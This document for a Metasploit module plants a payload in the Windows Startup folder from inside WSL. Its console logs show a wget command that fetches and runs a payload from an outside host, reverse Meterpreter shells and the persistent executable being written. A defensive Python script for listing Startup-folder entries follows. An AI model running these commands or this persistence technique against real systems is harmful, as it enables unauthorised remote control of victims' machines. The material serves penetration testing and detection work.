## Vulnerable Application

This module establishes persistence by creating a payload in the Windows Startup folder from within the Windows Subsystem for Linux (WSL) environment. This allows for code execution on Windows user login.

Verified on Windows 10 with Ubuntu 24.04 WSL distribution.

## Verification Steps

1. Get a shell on WSL (WSL could be started in a user or admin context)
2. `use exploit/linux/persistence/wsl/startup_folder`
3. `set SESSION `
4. `exploit`

## Options

### PAYLOAD_NAME

Name of the backdoor executable. Defaults to a random name.

### CONTEXT

Target a single user or All Users (system). Defaults to `USER`. Choices are `USER`, `SYSTEM`.

### USER

Only required when `CONTEXT` is set to `USER`. The user to exploit, or `ALL` for all of them. Defaults to `ALL`.

## Scenarios

### Tested on Windows 10 with Ubuntu 22.04 WSL

Initial access into WSL

```
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set target 7
target => 7
resource (/root/.msf4/msfconsole.rc)> set srvport 8082
srvport => 8082
resource (/root/.msf4/msfconsole.rc)> set uripath l
uripath => l
resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set lport 4446
lport => 4446
resource (/root/.msf4/msfconsole.rc)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Starting persistent handler(s)...
[*] Started reverse TCP handler on 1.1.1.1:4446
[*] Using URL: http://1.1.1.1:8082/l
[*] Server started.
[*] Run the following command on the target machine:
wget -qO Ql4GGpDh --no-check-certificate http://1.1.1.1:8082/l; chmod +x Ql4GGpDh; ./Ql4GGpDh& disown
msf exploit(multi/script/web_delivery) > 
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4446 -> 2.2.2.2:49859) at 2025-12-28 11:06:57 -0500
msf exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer     : win10prolicensed.localdomain
OS           : Ubuntu 24.04 (Linux 4.4.0-18362-Microsoft)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: windows
meterpreter > background
[*] Backgrounding session 1...
```

Install persistence

```
msf exploit(multi/script/web_delivery) > use exploit/linux/persistence/wsl/startup_folder
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(linux/persistence/wsl/startup_folder) > set session 1
session => 1
msf exploit(linux/persistence/wsl/startup_folder) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(linux/persistence/wsl/startup_folder) > exploit
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 1.1.1.1:4444
msf exploit(linux/persistence/wsl/startup_folder) > 
[!] SESSION may not be compatible with this module:
[!]  * incompatible session platform: linux. This module works with: Windows.
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Inside WSL environment
[+] The target appears to be vulnerable. Likely exploitable
[+] Writing payload to /mnt/c/Users/windows/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/dXSkUY.exe
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/win10prolicensed.localdomain_20251228.0757/win10prolicensed.localdomain_20251228.0757.rc
```

Log out and back in to Windows

```
[*] 2.2.2.2 - Meterpreter session 1 closed.  Reason: Died
msf exploit(linux/persistence/wsl/startup_folder) > 
[*] Sending stage (188998 bytes) to 2.2.2.2
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:49867) at 2025-12-28 11:08:56 -0500
msf exploit(linux/persistence/wsl/startup_folder) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: WIN10PROLICENSE\windows
meterpreter > sysinfo
Computer        : WIN10PROLICENSE
OS              : Windows 10 1909 (10.0 Build 18363).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > background
```
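The persistence this module leaves behind is a plain file in one of two well-known folders, which makes it straightforward to inventory from the defender's side. The script below is an added example, not part of this module or of Metasploit: it walks the same two locations the `CONTEXT` option targets (each profile's Roaming Startup folder for `USER`, the ProgramData All Users Startup folder for `SYSTEM`) under a mounted Windows volume and reports every file Windows would process at logon. It assumes the standard Start Menu path layout shown in the module output above and a volume root such as `/mnt/c` when run from inside WSL; with no argument it scans a constructed sample tree so it can be run offline.

```python
"""Inventory Windows Startup-folder entries through a mounted Windows volume.

Added defensive example; not part of the startup_folder module or Metasploit.
Scans the per-user Startup folder of every profile (what CONTEXT=USER writes
to) and the All Users Startup folder (CONTEXT=SYSTEM) beneath a volume root
such as /mnt/c, and flags anything Windows would execute at logon.
"""
import os
import sys
import tempfile
from dataclasses import dataclass
from typing import List

# Per-user Startup folder, relative to the profile directory; this is the
# location shown in the module's "Writing payload to" output line.
USER_STARTUP = os.path.join(
    "AppData", "Roaming", "Microsoft", "Windows", "Start Menu", "Programs", "Startup"
)
# All Users Startup folder, relative to the volume root (CONTEXT=SYSTEM).
SYSTEM_STARTUP = os.path.join(
    "ProgramData", "Microsoft", "Windows", "Start Menu", "Programs", "Startup"
)
# Windows keeps a desktop.ini in every Startup folder; anything else is worth listing.
BENIGN_NAMES = {"desktop.ini"}
# File types the shell runs directly when it processes the Startup folder at logon.
EXECUTABLE_EXTS = {".exe", ".com", ".scr", ".bat", ".cmd", ".vbs", ".js", ".ps1", ".hta", ".lnk"}


@dataclass(frozen=True)
class StartupEntry:
    context: str      # "USER" or "SYSTEM", mirroring the module's CONTEXT option
    user: str         # account name, or "ALL" for the All Users folder
    path: str
    executable: bool  # True when the extension is one Windows executes at logon


def _scan_folder(folder: str, context: str, user: str) -> List[StartupEntry]:
    """List the non-default files in one Startup folder (empty if it does not exist)."""
    if not os.path.isdir(folder):
        return []
    entries = []
    for name in sorted(os.listdir(folder)):
        full = os.path.join(folder, name)
        if name.lower() in BENIGN_NAMES or not os.path.isfile(full):
            continue
        ext = os.path.splitext(name)[1].lower()
        entries.append(StartupEntry(context, user, full, ext in EXECUTABLE_EXTS))
    return entries


def scan_startup_folders(volume_root: str) -> List[StartupEntry]:
    """Inventory the All Users Startup folder and every profile's Startup folder."""
    findings = _scan_folder(os.path.join(volume_root, SYSTEM_STARTUP), "SYSTEM", "ALL")
    users_dir = os.path.join(volume_root, "Users")
    if os.path.isdir(users_dir):
        for user in sorted(os.listdir(users_dir)):
            profile_startup = os.path.join(users_dir, user, USER_STARTUP)
            findings.extend(_scan_folder(profile_startup, "USER", user))
    return findings


def build_sample_volume() -> str:
    """Create a constructed, minimal Windows volume layout in a temp dir for offline runs.

    The tree mirrors the module output above: one profile named "windows" whose
    Startup folder holds dXSkUY.exe, plus an All Users Startup folder with a
    harmless text file. Constructed sample data only, not a real system.
    """
    root = tempfile.mkdtemp(prefix="startup-scan-")
    user_dir = os.path.join(root, "Users", "windows", USER_STARTUP)
    system_dir = os.path.join(root, SYSTEM_STARTUP)
    os.makedirs(user_dir)
    os.makedirs(system_dir)
    for path in (
        os.path.join(user_dir, "desktop.ini"),
        os.path.join(user_dir, "dXSkUY.exe"),
        os.path.join(system_dir, "desktop.ini"),
        os.path.join(system_dir, "readme.txt"),
    ):
        with open(path, "wb"):
            pass
    return root


def main(argv: List[str]) -> int:
    """Usage: scan_startup.py [VOLUME_ROOT]; with no argument, scans the constructed sample."""
    root = argv[1] if len(argv) > 1 else build_sample_volume()
    findings = scan_startup_folders(root)
    for entry in findings:
        tag = "EXECUTABLE" if entry.executable else "other"
        print(f"[{entry.context}:{entry.user}] {tag}: {entry.path}")
    # Non-zero exit when something executable is staged for logon, for use from a scheduled check.
    return 1 if any(e.executable for e in findings) else 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it as `python3 scan_startup.py /mnt/c` from WSL, or against any other mount point of the Windows volume. Entries are keyed the same way as the module's options (`SYSTEM:ALL` for the All Users folder, `USER:<name>` for each profile), so a finding maps directly onto which `CONTEXT`/`USER` combination would have produced it; `desktop.ini` is skipped because Windows itself places it in every Startup folder, and a `.lnk` is treated as executable because the shell resolves and launches its target at logon.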